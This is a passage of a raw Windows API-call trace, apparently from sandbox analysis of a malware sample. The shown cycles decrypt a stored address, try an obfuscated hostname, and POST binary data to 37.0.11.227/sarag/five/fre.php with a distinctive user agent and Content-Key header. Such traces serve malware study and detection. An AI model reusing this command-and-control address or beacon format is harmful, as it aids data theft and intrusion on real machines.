StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0306.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.020] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0306.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.021] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0306.022] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.022] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0306.022] GetProcessHeap () returned 0x690000 [0306.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0306.022] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0306.022] GetProcessHeap () returned 0x690000 [0306.022] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab320 [0306.022] socket (af=2, type=1, protocol=6) returned 0xa28 [0306.023] connect (s=0xa28, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0306.046] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0306.046] GetProcessHeap () returned 0x690000 [0306.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0306.046] GetProcessHeap () returned 0x690000 [0306.046] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0306.047] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0306.048] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0306.048] GetProcessHeap () returned 0x690000 [0306.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0306.048] GetProcessHeap () returned 0x690000 [0306.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0306.048] GetProcessHeap () returned 0x690000 [0306.048] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0306.048] GetProcessHeap () returned 0x690000 [0306.049] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0306.049] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0306.050] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0306.050] GetProcessHeap () returned 0x690000 [0306.050] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0306.050] GetProcessHeap () returned 0x690000 [0306.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0306.050] send (s=0xa28, buf=0x6ad508*, len=242, flags=0) returned 242 [0306.050] send (s=0xa28, buf=0x6aba40*, len=159, flags=0) returned 159 [0306.051] GetProcessHeap () returned 0x690000 [0306.051] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0306.051] recv (in: s=0xa28, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0306.127] GetProcessHeap () returned 0x690000 [0306.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0306.130] GetProcessHeap () returned 0x690000 [0306.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0306.130] GetProcessHeap () returned 0x690000 [0306.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0306.131] GetProcessHeap () returned 0x690000 [0306.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aedd0 | out: hHeap=0x690000) returned 1 [0306.131] closesocket (s=0xa28) returned 0 [0306.131] GetProcessHeap () returned 0x690000 [0306.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab320 | out: hHeap=0x690000) returned 1 [0306.132] GetProcessHeap () returned 0x690000 [0306.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0306.132] GetProcessHeap () returned 0x690000 [0306.132] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0306.132] GetProcessHeap () returned 0x690000 [0306.133] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0306.133] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x177c) returned 0xa28 [0306.135] Sleep (dwMilliseconds=0xea60) [0306.137] GetProcessHeap () returned 0x690000 [0306.137] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0306.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.139] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.145] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0306.150] GetProcessHeap () returned 0x690000 [0306.150] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0306.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.151] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0306.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.152] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.152] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.153] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.153] GetProcessHeap () returned 0x690000 [0306.153] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0306.155] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.156] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0306.159] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.160] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0306.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.161] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0306.161] GetProcessHeap () returned 0x690000 [0306.161] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0306.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.170] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.172] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.172] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.172] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.173] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.173] GetProcessHeap () returned 0x690000 [0306.173] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0306.173] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.174] GetProcessHeap () returned 0x690000 [0306.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0306.174] GetProcessHeap () returned 0x690000 [0306.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0306.175] GetProcessHeap () returned 0x690000 [0306.175] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0306.175] GetProcessHeap () returned 0x690000 [0306.175] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0306.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.176] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.181] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0306.186] GetProcessHeap () returned 0x690000 [0306.186] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0306.187] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.187] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0306.188] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.188] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.189] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.189] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.189] GetProcessHeap () returned 0x690000 [0306.189] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0306.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.190] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0306.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.191] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0306.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.192] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0306.192] GetProcessHeap () returned 0x690000 [0306.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0306.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.193] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0306.193] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.194] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0306.194] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.194] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0306.195] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.195] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0306.195] GetProcessHeap () returned 0x690000 [0306.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0306.195] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0306.195] GetProcessHeap () returned 0x690000 [0306.195] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0306.195] socket (af=2, type=1, protocol=6) returned 0xa2c [0306.196] connect (s=0xa2c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0306.220] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0306.220] GetProcessHeap () returned 0x690000 [0306.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0306.220] GetProcessHeap () returned 0x690000 [0306.220] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0306.221] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0306.221] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0306.221] GetProcessHeap () returned 0x690000 [0306.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0306.221] GetProcessHeap () returned 0x690000 [0306.222] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0306.222] GetProcessHeap () returned 0x690000 [0306.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0306.222] GetProcessHeap () returned 0x690000 [0306.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0306.223] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0306.224] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0306.224] GetProcessHeap () returned 0x690000 [0306.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0306.224] GetProcessHeap () returned 0x690000 [0306.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0306.224] send (s=0xa2c, buf=0x6ad508*, len=242, flags=0) returned 242 [0306.225] send (s=0xa2c, buf=0x6aba40*, len=159, flags=0) returned 159 [0306.225] GetProcessHeap () returned 0x690000 [0306.225] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0306.225] recv (in: s=0xa2c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0306.303] GetProcessHeap () returned 0x690000 [0306.304] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0306.304] GetProcessHeap () returned 0x690000 [0306.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0306.305] GetProcessHeap () returned 0x690000 [0306.305] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0306.305] GetProcessHeap () returned 0x690000 [0306.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0306.306] closesocket (s=0xa2c) returned 0 [0306.306] GetProcessHeap () returned 0x690000 [0306.306] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0306.306] GetProcessHeap () returned 0x690000 [0306.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0306.307] GetProcessHeap () returned 0x690000 [0306.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0306.307] GetProcessHeap () returned 0x690000 [0306.307] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0306.307] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1784) returned 0xa2c [0306.413] Sleep (dwMilliseconds=0xea60) [0306.414] GetProcessHeap () returned 0x690000 [0306.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0306.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.415] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.423] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0306.429] GetProcessHeap () returned 0x690000 [0306.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0306.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.430] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0306.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.431] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.431] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.434] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.434] GetProcessHeap () returned 0x690000 [0306.434] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0306.437] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.437] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0306.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.438] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0306.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.439] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0306.439] GetProcessHeap () returned 0x690000 [0306.439] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0306.440] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.440] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0306.441] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.441] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0306.442] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.442] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0306.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.443] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0306.443] GetProcessHeap () returned 0x690000 [0306.443] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0306.443] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0306.443] GetProcessHeap () returned 0x690000 [0306.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0306.444] GetProcessHeap () returned 0x690000 [0306.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0306.444] GetProcessHeap () returned 0x690000 [0306.444] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0306.444] GetProcessHeap () returned 0x690000 [0306.444] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0306.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.445] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0306.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.449] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0306.456] GetProcessHeap () returned 0x690000 [0306.456] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0306.456] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.457] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0306.457] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.457] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0306.458] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.459] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0306.459] GetProcessHeap () returned 0x690000 [0306.459] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0306.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.460] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0306.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.461] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0306.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0306.462] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0306.463] GetProcessHeap () returned 0x690000 [0306.463] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0306.463] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.463] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0306.464] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.464] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0306.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.467] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0306.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0306.468] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0306.468] GetProcessHeap () returned 0x690000 [0306.468] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0306.468] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0306.468] GetProcessHeap () returned 0x690000 [0306.468] 